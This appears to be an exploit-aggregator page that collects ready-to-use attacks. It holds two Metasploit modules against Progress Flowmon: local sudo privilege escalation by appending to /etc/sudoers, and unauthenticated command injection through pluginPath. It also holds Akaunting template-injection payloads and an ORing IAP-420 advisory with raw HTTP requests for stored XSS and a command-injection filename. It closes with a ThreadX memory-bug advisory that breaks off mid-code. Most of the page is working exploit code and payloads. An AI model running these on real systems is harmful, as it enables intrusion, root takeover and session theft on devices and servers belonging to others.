Latest exploits :: CodePwn

<pre><code># This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::File prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Progress Flowmon Local sudo privilege escalation', 'Description' => %q{ This module abuses a feature of the sudo command on Progress Flowmon. Certain binary files are allowed to automatically elevate with the sudo command. This is based off of the file name. This includes executing a PHP command with a specific file name. If the file is overwritten with PHP code it can be used to elevate privileges to root. Progress Flowmon up to at least version 12.3.5 is vulnerable. }, 'Author' => [ 'Dave Yesland with Rhino Security Labs', ], 'License' => MSF_LICENSE, 'References' => [ ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'], ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability'] ], 'DisclosureDate' => '2024-03-19', 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], 'Reliability' => [ REPEATABLE_SESSION ] }, 'SessionTypes' => ['shell', 'meterpreter'], 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_X86, ARCH_X64], 'Targets' => [['Automatic', {}]], 'Privileged' => true ) ) register_options([ OptString.new('WRITABLE_DIR', [ true, 'A directory where we can write files', '/tmp' ]), ]) end def check score = 0 score += 1 if read_file('/var/www/shtml/index.php')&.include?('FlowMon') score += 1 if read_file('/var/www/shtml/ui/manifest.json')&.include?('Flowmon Web Interface') score += 1 if exists?('/var/www/shtml/translate.php') vprint_status("Found #{score} indicators this is a Progress Flowmon product") return CheckCode::Detected if score > 0 return CheckCode::Safe end def on_new_session(session) super print_status('Cleaning up addition to /etc/sudoers') if session.type.to_s.eql? 'meterpreter' session.sys.process.execute '/bin/sh', "-c \"sed -i '/^ADMINS ALL=(ALL) NOPASSWD: ALL$/d' /etc/sudoers\"" elsif session.type.to_s.eql? 'shell' session.shell_command_token 'sed -i \'/^ADMINS ALL=(ALL) NOPASSWD: ALL$/d\' /etc/sudoers' end end def cleanup super unless @index_php_contents.blank? print_status('Restoring /var/www/shtml/index.php file contents...') file_rm('/var/www/shtml/index.php') write_file('/var/www/shtml/index.php', @index_php_contents) end end def exploit @index_php_contents = '' fail_with(Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable") unless writable?(datastore['WRITABLE_DIR']) exploit_file = "#{datastore['WRITABLE_DIR']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}" vprint_status("Saving payload as #{exploit_file}") write_file(exploit_file, generate_payload_exe) chmod(exploit_file) register_file_for_cleanup(exploit_file) @index_php_contents = read_file('/var/www/shtml/index.php') print_status('Overwriting /var/www/shtml/index.php with payload') cmd_exec('echo \'<?php system("echo \\"ADMINS ALL=(ALL) NOPASSWD: ALL\\" >> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;') print_status('Executing sudo to elevate privileges') cmd_exec('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;') cmd_exec("sudo '#{exploit_file}'") end end </code></pre>

<pre><code># Exploit Title: Akaunting 3.1.8 - Client Side Template Injection CSTI # Exploit Author: tmrswrr # Date: 30/05/2024 # Vendor: https://akaunting.com/forum # Software Link: https://akaunting.com/apps/crm # Vulnerable Version(s): 3.1.8 1 ) Login with admin cred and go to : Currencies > New Currency https://127.0.0.1/Akaunting/1/settings/currencies 2 ) Write SSTI payload : {{ Object.keys(this) }} Name field 3 ) Save it 4 ) You will be see result : "_uid", "_isVue", "__v_skip", "_scope", "$options", "_renderProxy", "_self", "$parent", "$root", "$children", "$refs", > {{ this.$root.$data }} > "form": {}, "bulk_action": { "path": "currencies", "count": "", "value": "*", "message": "", "type": "", "show": false, "modal": false, "loading": false, "selected": [], > {{ Object.keys(this._self) }} > "_uid", "_isVue", "__v_skip", "_scope", "$options", "_renderProxy", "_self", "$parent", "$root", "$children", "$refs", > {{$on.constructor('alert(1)')()}} > You will be see alert box ======================================================================================= 1 ) Login with admin cred and go to : Items > New Item https://127.0.0.1/Akaunting/1/common/items 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 ==================================================================================== 1 ) Login with admin cred and go to :Settings > Taxes > New Tax https://127.0.0.1/Akaunting/1/settings/taxes/1/edit 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ==================================================================================== 1 ) Login with admin cred and go to : Banking > Transactions > New Income https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income 2 ) Write SSTI payload : {{7*7}} Description field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ======================================================================================= 1 ) Login with admin cred https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit 2 ) Write SSTI payload : {{7*7}} Name field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab > {{self}} > </code></pre>

<pre><code># Exploit Title: Akaunting 3.1.8 - Server-Side Template Injection (SSTI) # Exploit Author: tmrswrr # Date: 30/05/2024 # Vendor: https://akaunting.com/forum # Software Link: https://akaunting.com/apps/crm # Vulnerable Version(s): 3.1.8 # Tested : https://www.softaculous.com/apps/erp/Akaunting 1 ) Login with admin cred and go to : Items > New Item https://127.0.0.1/Akaunting/1/common/items 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 ==================================================================================== 1 ) Login with admin cred and go to :Settings > Taxes > New Tax https://127.0.0.1/Akaunting/1/settings/taxes/1/edit 2 ) Write SSTI payload : {{7*7}} Name field , write Sale and Purchase Price random numbers 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ==================================================================================== 1 ) Login with admin cred and go to : Banking > Transactions > New Income https://127.0.0.1/Akaunting/1/banking/transactions/create?type=income 2 ) Write SSTI payload : {{7*7}} Description field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab ======================================================================================= 1 ) Login with admin cred https://127.0.0.1/Akaunting/1/purchases/vendors/1/edit 2 ) Write SSTI payload : {{7*7}} Name field 3 ) Save it 4 ) You will be see result : 49 > {{'a'.toUpperCase()}} > A > {{'a'.concat('b')}} > ab </code></pre>

<pre><code>CyberDanube Security Research 20240528-0 ------------------------------------------------------------------------------- title| Multiple Vulnerabilities product| ORing IAP-420 vulnerable version| 2.01e fixed version| - CVE number| CVE-2024-5410, CVE-2024-5411 impact| High homepage| https://oringnet.com/ found| 2024-01-19 by| T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. Pölten | | https://www.cyberdanube.com ------------------------------------------------------------------------------- Vendor description ------------------------------------------------------------------------------- "Founded in 2005, ORing specializes in developing innovative own-branded products for industrial settings. Over the years, ORing has accumulated abundant experience in wired and wireless network communications industry. In line with the commercialization of 5G, ORing has stretched its arm into the IIoT field, helping customers realize all kinds of IIoT applications such as smart manufacturing, smart city, and industrial automation. With high product quality and best customer services in mind, ORing has continued to launch cutting-edge products catering to customer needs. ORing's products have been widely adopted in surveillance, rail transport, industrial automation, power substations, renewable energy, and marine industries with offices worldwide to address customer needs in real time." Source: https://oringnet.com/en/about-us/company-profile Vulnerable versions ------------------------------------------------------------------------------- IAP-420 / 2.01e Vulnerability overview ------------------------------------------------------------------------------- 1) Stored Cross-Site Scripting (CVE-2024-5410) A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. The SSID of the WiFi can be configured to contain arbitrary JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user. 2) Authenticated Command Injection (CVE-2024-5411) The filename parameter of the config file upload is prone to a Command Injection vulnerability. This vulnerability can only be exploited if a user is authenticated to the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device. Proof of Concept ------------------------------------------------------------------------------- 1) Stored Cross-Site Scripting (CVE-2024-5410) Stored Cross-Site Scripting can be triggered by placing JavaScript code into the SSID input field of the web interface as authenticated user. A single request for injecting the script is shown below: ------------------------------------------------------------------------------- POST /cgi-bin/wl_set.cgi HTTP/1.1 Host: 192.168.0.1 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 659 Connection: keep-alive Cookie: auth=YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 sel_op_mode=client&sel_mssid=0&tf_ssid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sel_isolation=0& sel_mssid_isolation=0&sel_auth_mode=0&rb_wep_authmode=0&sel_wep_enc_bits=0& sel_wep_key_type=0&tf_key1=&tf_key2=&tf_key3=&tf_key4=&rb_wpapsk_authmode=0& rb_wpapsk_enc=0&tf_wpa_key=&rb_wpa_authmode=0&rb_wpa_enc=0&tf_ip1=&tf_ip2=& tf_ip3=&tf_ip4=&tf_radius_port=&tf_radius_key=&tf_ip1_1x=&tf_ip2_1x=& tf_ip3_1x=&tf_ip4_1x=&tf_radius_port_1x=&tf_radius_key_1x=&bt_save=Save& lang=en&channel=0&isolation=0&mssid_isolation=0&auth_mode=0&wep_authmode=0& wpapsk_authmode=0&wpa_authmode=0&wpa_enc_type=0&wep_enc_bits=0&wep_key_type=0& wep_key_index=0&ret_msg= ------------------------------------------------------------------------------- 2) Authenticated Command Injection (CVE-2024-5411) A command can be injected in the filename of the uploaded config. By sending a request as shown below, the content of the current directory can be shown: ------------------------------------------------------------------------------- POST /cgi-bin/admin_config.cgi?todo=upconf HTTP/1.1 Host: 10.69.10.2 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------347087158737672164432057801583 Content-Length: 563 Connection: keep-alive Cookie: auth=YWRtaW46YWRtaW4= Upgrade-Insecure-Requests: 1 -----------------------------347087158737672164432057801583 Content-Disposition: form-data; name="upfile"; filename="test.bin;ls${IFS}-la;" -----------------------------347087158737672164432057801583 Content-Disposition: form-data; name="bt_upconf" Upload -----------------------------347087158737672164432057801583 Content-Disposition: form-data; name="lang" en -----------------------------347087158737672164432057801583 Content-Disposition: form-data; name="ret_msg_upconf" -----------------------------347087158737672164432057801583-- ------------------------------------------------------------------------------- This request is equal to executing "ls -la" on the console of the device. ------------------------------------------------------------------------------- HTTP/1.0 200 OK tar: can't open '/tmp/test.bin': No such file or directory drwxr-xr-x 4 root root 1024 Mar 7 14:36 . drwxr-xr-x 8 root root 1024 Jan 30 2024 .. -rwxr-xr-x 1 root root 17572 Jan 30 2024 admin_config.cgi -rwxr-xr-x 1 root root 17584 Jan 30 2024 admin_default.cgi -rwxr-xr-x 1 root root 15984 Jan 30 2024 admin_fwup.cgi -rwxr-xr-x 1 root root 12476 Jan 30 2024 admin_password.cgi -rwxr-xr-x 1 root root 13164 Jan 30 2024 admin_restart.cgi -rwxr-xr-x 1 root root 33336 Jan 30 2024 adv_filters.cgi -rwxr-xr-x 1 root root 15032 Jan 30 2024 adv_misc.cgi -rwxr-xr-x 1 root root 72168 Jan 30 2024 adv_rstp.cgi -rwxr-xr-x 1 root root 6588 Jan 30 2024 backup_unit.cgi [...] ------------------------------------------------------------------------------- The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). Solution ------------------------------------------------------------------------------- None Workaround ------------------------------------------------------------------------------- None Recommendation ------------------------------------------------------------------------------- CyberDanube recommends Oring customers to upgrade the firmware to the latest version available and to restrict network access to the management interface of the device. Contact Timeline ------------------------------------------------------------------------------- 2024-02-06: Contacting ORing via support@oringnet.com. Automatic holiday reply. 2024-02-19: Asking for an update. No reply. 2024-02-28: Asking for an update. No reply. 2024-03-11: Searched for "cyber security manager" on LinkedIn. Contacted him and got the answer, that the content should be sent to "support@oringnet.com". Sent the advisory to this address directly. 2024-03-20: Asking for an update. No reply. 2024-04-10: Asking for an update. No reply. 2024-04-30: Including support_us@oringnet.com. Asking for an update. Added notification about responsible disclosure deadline. No reply. 2024-05-02: Including support_eu@oringnet.com. Asking for an update. Added notification about responsible disclosure deadline. No reply. 2024-05-27: Sent information that the advisory will be published on 2024-05-28. 2024-05-28: Public release of security advisory. Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com EOF T. Weber / @2024 </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Flowmon Unauthenticated Command Injection', 'Description' => %q{ This module exploits an unauthenticated command injection vulnerability in Progress Flowmon versions before v12.03.02. }, 'Author' => [ 'Dave Yesland with Rhino Security Labs', ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2024-2389'], ['URL', 'https://rhinosecuritylabs.com/research/cve-2024-2389-in-progress-flowmon/'], ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability'] ], 'DisclosureDate' => '2024-04-23', 'Notes' => { 'Stability' => [ CRASH_SAFE ], 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], 'Reliability' => [ REPEATABLE_SESSION ] }, 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD], 'Targets' => [['Automatic', {}]], 'Privileged' => false, 'DefaultOptions' => { 'SSL' => true, 'RPORT' => 443 } ) ) register_options([ OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/']) ]) end def execute_command(cmd) send_request_cgi( 'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'), 'method' => 'GET', 'vars_get' => { 'file' => rand_text_alphanumeric(8), 'lang' => rand_text_alphanumeric(8), 'pluginPath' => "$(#{cmd})" } ) end def exploit print_status('Attempting to execute payload...') execute_command(payload.encoded) end def check print_status("Checking if #{peer} can be exploited!") uri = normalize_uri(target_uri.path, 'homepage/auth/login') res = send_request_cgi( 'uri' => uri, 'method' => 'GET' ) return CheckCode::Unknown('Connection failed') unless res return CheckCode::Safe('Target does not appear to be running Progress Flowmon') unless res.code == 200 && res.get_html_document.xpath('//title').text == 'Flowmon Web Interface' # Use a regular expression to extract the version number from the response version = res.body.match(%r{/favicon\.ico\?v=([\d.]+)}) return CheckCode::Unknown('Unable to determine the version from the favicon link.') unless version && version[1] print_status("Detected version: #{version[1]}") if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02') CheckCode::Vulnerable("Version #{version[1]} is vulnerable.") else CheckCode::Safe("Version #{version[1]} is not vulnerable.") end end end </code></pre>

<pre><code>--[ HNS-2024-06 - HN Security Advisory - https://security.humanativaspa.it/ * Title: Multiple vulnerabilities in Eclipse ThreadX * OS: Eclipse ThreadX < 6.4.0 * Author: Marco Ivaldi <marco.ivaldi@hnsecurity.it> * Date: 2024-05-28 * CVE IDs and severity: * CVE-2024-2214 - High - 7.0 - CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H * CVE-2024-2212 - High - 7.3 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L * CVE-2024-2452 - High - 7.0 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L * Advisory URLs: * https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-vmp6-qhp9-r66x * https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-v9jj-7qjg-h6g6 * https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-h963-7vhw-8rpx * Vendor URL: https://threadx.io/ --[ 0 - Table of contents 1 - Summary 2 - Background 3 - Vulnerabilities 3.1 - CVE-2024-2214 - Ineffective array size check and static buffer overflow in Eclipse ThreadX 3.2 - CVE-2024-2212 - Integer wraparounds, under-allocations, and heap buffer overflows in in Eclipse ThreadX 3.3 - CVE-2024-2452 - Integer wraparound, under-allocation, and heap buffer overflow in Eclipse ThreadX NetX Duo 3.4 - Other bugs with potential security implications in Eclipse ThreadX NetX Duo and USBX 4 - Affected products 5 - Remediation 6 - Disclosure timeline 7 - Acknowledgments 8 - References --[ 1 - Summary "Why don’t you pick on projects your own size, quit tormenting the tiny ones!" -- The Grugq Azure RTOS was Microsoft's real-time operating system for IoT devices. At the beginning of 2024, Microsoft contributed the Azure RTOS technology to the Eclipse Foundation [1]. With the Eclipse Foundation as its new home, Azure RTOS was rebranded as Eclipse ThreadX. Eclipse ThreadX is an advanced embedded development suite including a small but powerful operating system that provides reliable, ultra-fast performance for resource-constrained devices. It offers a vendor-neutral, open source, safety certified OS for real-time applications, all under a permissive license. We reviewed ThreadX's source code hosted on GitHub [2] and identified multiple security vulnerabilities that may cause memory corruption. Their impacts range from denial of service to potential arbitrary code execution. --[ 2 - Background Continuing our recent vulnerability research work in the IoT space [3] [4] [5], we keep assisting open-source projects in finding and fixing vulnerabilities by reviewing their source code. In December 2023, Azure RTOS, which one month later was rebranded as Eclipse ThreadX, was selected as a target of interest. During the source code review, we made use of our Semgrep C/C++ ruleset [6] and weggli pattern collection [7] to identify hotspots in code on which to focus our attention. --[ 3 - Vulnerabilities The vulnerabilities resulting from our source code review are briefly described in the following sections. --[ 3.1 - CVE-2024-2214 - Ineffective array size check and static buffer overflow in Eclipse ThreadX In Eclipse ThreadX before version 6.4.0, the `_Mtxinit()` function in the Xtensa port was missing an array size check causing a memory overwrite. The vulnerability was spotted in the following file: * /ports/xtensa/xcc/src/tx_clib_lock.c There was no error handling in case `lcnt` >= `XT_NUM_CLIB_LOCKS`. The program would continue and the `tx_mutex_create()` would eventually corrupt memory by writing outside the bounds of the `xclib_locks` static array: ```c #ifdef TX_THREAD_SAFE_CLIB /* this file is only needed if using C lib */ ... #if XSHAL_CLIB == XTHAL_CLIB_XCLIB ... static TX_MUTEX xclib_locks[XT_NUM_CLIB_LOCKS]; static uint32_t lcnt; ... /**************************************************************************/ /* _Mtxinit - initialize a lock. Called once for each lock. */ /**************************************************************************/ void _Mtxinit (_Rmtx * mtx) { TX_MUTEX * lock; if (lcnt >= XT_NUM_CLIB_LOCKS) { // VULN: empty if() body /* Fatal error */ } lock = &(xclib_locks[lcnt]); lcnt++; /* See notes for newlib case below. */ #ifdef THREADX_TESTSUITE tx_mutex_create (lock, "Clib lock", 0); #else tx_mutex_create (lock, "Clib lock", TX_INHERIT); #endif *mtx = lock; } ``` Fixes: https://github.com/eclipse-threadx/threadx/pull/340 See also: https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-vmp6-qhp9-r66x --[ 3.2 - CVE-2024-2212 - Integer wraparounds, under-allocations, and heap buffer overflows in in Eclipse ThreadX In Eclipse ThreadX before version 6.4.0, functions `xQueueCreate()` and `xQueueCreateSet()` from the FreeRTOS compatibility API were missing parameter checks. This could lead to integer wraparound, under-allocations, and heap buffer overflows. The vulnerabilities were spotted in the following file: * /utility/rtos_compatibility_layers/FreeRTOS/tx_freertos.c If an attacker could control `uxQueueLength` or `uxItemSize`, they could cause an integer wraparound thus causing `txfr_malloc()` to allocate a small amount of memory, exposing to subsequent heap buffer overflows (AKA BadAlloc-style memory corruption): ```c QueueHandle_t xQueueCreate(UBaseType_t uxQueueLength, UBaseType_t uxItemSize) { txfr_queue_t *p_queue; void *p_mem; size_t mem_size; UINT ret; configASSERT(uxQueueLength != 0u); configASSERT(uxItemSize >= sizeof(UINT)); #if (TX_FREERTOS_AUTO_INIT == 1) if(txfr_initialized != 1u) { tx_freertos_auto_init(); } #endif p_queue = txfr_malloc(sizeof(txfr_queue_t)); if(p_queue == NULL) { return NULL; } mem_size = uxQueueLength*(uxItemSize); p_mem = txfr_malloc(mem_size); // VULN: integer wraparound and under-allocation if(p_mem == NULL) { txfr_free(p_queue); return NULL; } TX_MEMSET(p_mem, 0, mem_size); TX_MEMSET(p_queue, 0, sizeof(*p_queue)); p_queue->allocated = 1u; p_queue->p_mem = p_mem; p_queue->id = TX_QUEUE_ID; p_queue->p_write = (uint8_t *)p_mem; p_queue->p_read = (uint8_t *)p_mem; p_queue->msg_size = uxItemSize; p_queue->queue_length = uxQueueLength; ret = tx_semaphore_create(&p_queue->read_sem, "", 0u); if(ret != TX_SUCCESS) { return NULL; } ret = tx_semaphore_create(&p_queue->write_sem, "", uxQueueLength); if(ret != TX_SUCCESS) { return NULL; } return p_queue; } ``` If an attacker could control `uxEventQueueLengthi`, they could cause an integer wraparound thus causing `txfr_malloc()` to allocate a small amount of memory, exposing to subsequent heap buffer overflows (AKA BadAlloc-style memory corruption): ```c QueueSetHandle_t xQueueCreateSet(const UBaseType_t uxEventQueueLength) { txfr_queueset_t *p_set; void *p_mem; ULONG queue_size; UINT ret; configASSERT(uxEventQueueLength != 0u); #if (TX_FREERTOS_AUTO_INIT == 1) if(txfr_initialized != 1u) { tx_freertos_auto_init(); } #endif p_set = txfr_malloc(sizeof(txfr_queueset_t)); if(p_set == NULL) { return NULL; } queue_size = sizeof(void *) * uxEventQueueLength; p_mem = txfr_malloc(queue_size); // VULN: integer wraparound and under-allocation if(p_mem == NULL) { txfr_free(p_set); return NULL; } ret = tx_queue_create(&p_set->queue, "", sizeof(void *) / sizeof(UINT), p_mem, queue_size); if(ret != TX_SUCCESS) { TX_FREERTOS_ASSERT_FAIL(); return NULL; } return p_set; } ``` These functions are part of an external API to be used by user's applications. The values of those parameters passed to the vulnerable functions depend on user's code. Fixes: https://github.com/eclipse-threadx/threadx/pull/339 See also: https://github.com/eclipse-threadx/threadx/security/advisories/GHSA-v9jj-7qjg-h6g6 --[ 3.3 - CVE-2024-2452 - Integer wraparound, under-allocation, and heap buffer overflow in Eclipse ThreadX NetX Duo In Eclipse ThreadX NetX Duo before version 6.4.0, if an attacker could control the parameters of `__portable_aligned_alloc()` they could cause an integer wraparound and an allocation smaller than expected. This could cause subsequent heap buffer overflows. The vulnerability was spotted in the following file: * /addons/azure_iot/azure_iot_security_module/iot-security-module-core/deps/flatcc/include/flatcc/portable/paligned_alloc.h If an attacker could control the `size` or `alignment` arguments to the `__portable_aligned_alloc()` function, they could cause an integer wraparound thus causing `malloc()` to allocate a small amount of memory, exposing to subsequent heap buffer overflows (AKA BadAlloc-style memory corruption): ```c static inline void *__portable_aligned_alloc(size_t alignment, size_t size) { char *raw; void *buf; size_t total_size = (size + alignment - 1 + sizeof(void *)); // VULN: integer wraparound if (alignment < sizeof(void *)) { alignment = sizeof(void *); } raw = (char *)(size_t)malloc(total_size); // VULN: under-allocation BadAlloc style buf = raw + alignment - 1 + sizeof(void *); buf = (void *)(((size_t)buf) & ~(alignment - 1)); ((void **)buf)[-1] = raw; // malloc ret is not checked; in case NULL is returned the program would crash here return buf; } ``` We spotted the same vulnerability in Azure IoT Preview source code at: https://github.com/azure-rtos/azure-iot-preview/blob/master/azure_iot/azure_iot_security_module/iot-security-module-core/deps/flatcc/include/flatcc/portable/paligned_alloc.h The maintainers confirmed the vulnerability, but informed us that the Azure IoT Preview repository was not part of a product. Therefore, it was removed entirely. Fixes: https://github.com/eclipse-threadx/netxduo/pull/227 See also: https://github.com/eclipse-threadx/netxduo/security/advisories/GHSA-h963-7vhw-8rpx --[ 3.4 - Other bugs with potential security implications in Eclipse ThreadX NetX Duo and USBX In addition to the vulnerabilities covered in the previous sections, we also reported a few other bugs with potential security implications that were not considered as vulnerabilities by Eclipse ThreadX maintainers. As such, our reports were declassed to standard issues for code improvement. The first one is an unsafe use of the return value of `snprintf()` that we observed in Eclipse ThreadX NetX Duo, in the following file: * /addons/azure_iot/nx_azure_iot_adu_agent.c The `snprintf()` API function returns the total length of the string it tried to create, which could be larger than the actual length written; if an attacker were able to craft input so that `update_id_length` became larger than `NX_AZURE_IOT_ADU_AGENT_UPDATE_MANIFEST_SIZE` and if the return value were used unsafely (e.g., as an array index) somewhere else in the code, memory corruption could have occured: ```c static UINT nx_azure_iot_adu_agent_reported_properties_state_send(NX_AZURE_IOT_ADU_AGENT *adu_agent_ptr) { NX_PACKET *packet_ptr; NX_AZURE_IOT_JSON_WRITER json_writer; NX_AZURE_IOT_ADU_AGENT_UPDATE_MANIFEST_CONTENT *manifest_content = &(adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest_content); UINT status; UINT result_code; UINT i; /* Prepare the buffer for step name: such as: "step_0", the max name is "step_xxx". */ CHAR step_property_name[8] = "step_"; UINT step_size = sizeof("step_") - 1; UINT step_property_name_size; UINT update_id_length; ... /* Fill installed update id. */ if ((adu_agent_ptr -> nx_azure_iot_adu_agent_state == NX_AZURE_IOT_ADU_AGENT_STATE_IDLE) && (adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest_content.steps_count)) { /* Use nx_azure_iot_adu_agent_update_manifest as temporary buffer to encode the update id as string.*/ update_id_length = (UINT)snprintf((CHAR *)adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest, NX_AZURE_IOT_ADU_AGENT_UPDATE_MANIFEST_SIZE, "{\"%.*s\":\"%.*s\",\"%.*s\":\"%.*s\",\"%.*s\":\"%.*s\"}", sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_PROVIDER) - 1, NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_PROVIDER, manifest_content -> update_id.provider_length, manifest_content -> update_id.provider, sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_NAME) - 1, NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_NAME, manifest_content -> update_id.name_length, manifest_content -> update_id.name, sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_VERSION) - 1, NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_VERSION, manifest_content -> update_id.version_length, manifest_content -> update_id.version); // VULN: unsafe use of snprintf() return value if (nx_azure_iot_json_writer_append_property_with_string_value(&json_writer, (const UCHAR *)NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_INSTALLED_CONTENT_ID, sizeof(NX_AZURE_IOT_ADU_AGENT_PROPERTY_NAME_INSTALLED_CONTENT_ID) - 1, adu_agent_ptr -> nx_azure_iot_adu_agent_update_manifest, update_id_length)) // VULN: potentially large length is used to populate the "installedUpdateId" JSON property { nx_packet_release(packet_ptr); return (NX_NOT_SUCCESSFUL); } } ... ``` We also spotted some potentially ineffective size checks due to assertions in Eclipse ThreadX USBX, in the following files: * /common/core/src/ux_hcd_sim_host_transaction_schedule.c * /common/usbx_device_classes/src/ux_device_class_audio20_control_process.c If assertions were compiled-out in production code and `td -> ux_sim_host_td_length` was attacker-controlled, the `_ux_utility_memory_copy()` function would have been able to write past the `slave_transfer_request -> ux_slave_transfer_request_setup` fixed-size (8 bytes) buffer: ```c UINT _ux_hcd_sim_host_transaction_schedule(UX_HCD_SIM_HOST *hcd_sim_host, UX_HCD_SIM_HOST_ED *ed) { UX_DCD_SIM_SLAVE *dcd_sim_slave; UX_HCD_SIM_HOST_TD *td; UX_HCD_SIM_HOST_TD *head_td; UX_HCD_SIM_HOST_TD *tail_td; UX_HCD_SIM_HOST_TD *data_td; UX_ENDPOINT *endpoint; UX_SLAVE_ENDPOINT *slave_endpoint; UX_DCD_SIM_SLAVE_ED *slave_ed; ULONG slave_transfer_remaining; UCHAR wake_host; UCHAR wake_slave; ULONG transaction_length; ULONG td_length; UX_SLAVE_TRANSFER *slave_transfer_request; UX_TRANSFER *transfer_request; ULONG endpoint_index; UX_SLAVE_DCD *dcd; UX_PARAMETER_NOT_USED(hcd_sim_host); /* Get the pointer to the DCD portion of the simulator. */ dcd = &_ux_system_slave -> ux_system_slave_dcd; /* Check the state of the controller if OPERATIONAL . */ if (dcd -> ux_slave_dcd_status != UX_DCD_STATUS_OPERATIONAL) return(UX_ERROR); /* Get the pointer to the candidate TD on the host. */ td = ed -> ux_sim_host_ed_head_td; /* Get the pointer to the endpoint. */ endpoint = ed -> ux_sim_host_ed_endpoint; /* Get the pointer to the transfer_request attached with this TD. */ transfer_request = td -> ux_sim_host_td_transfer_request; /* Get the index of the endpoint from the host. */ endpoint_index = endpoint -> ux_endpoint_descriptor.bEndpointAddress & ~(ULONG)UX_ENDPOINT_DIRECTION; /* Get the address of the device controller. */ dcd_sim_slave = (UX_DCD_SIM_SLAVE *) dcd -> ux_slave_dcd_controller_hardware; /* Get the endpoint as seen from the device side. */ #ifdef UX_DEVICE_BIDIRECTIONAL_ENDPOINT_SUPPORT slave_ed = ((endpoint -> ux_endpoint_descriptor.bEndpointAddress == 0) ? &dcd_sim_slave -> ux_dcd_sim_slave_ed[0] : ((endpoint -> ux_endpoint_descriptor.bEndpointAddress & UX_ENDPOINT_DIRECTION) ? &dcd_sim_slave -> ux_dcd_sim_slave_ed_in[endpoint_index] : &dcd_sim_slave -> ux_dcd_sim_slave_ed[endpoint_index])); #else slave_ed = &dcd_sim_slave -> ux_dcd_sim_slave_ed[endpoint_index]; #endif /* Is this ED used? */ if ((slave_ed -> ux_sim_slave_ed_status & UX_DCD_SIM_SLAVE_ED_STATUS_USED) == 0) return(UX_ERROR); /* Is this ED ready for transaction or stalled ? */ if ((slave_ed -> ux_sim_slave_ed_status & 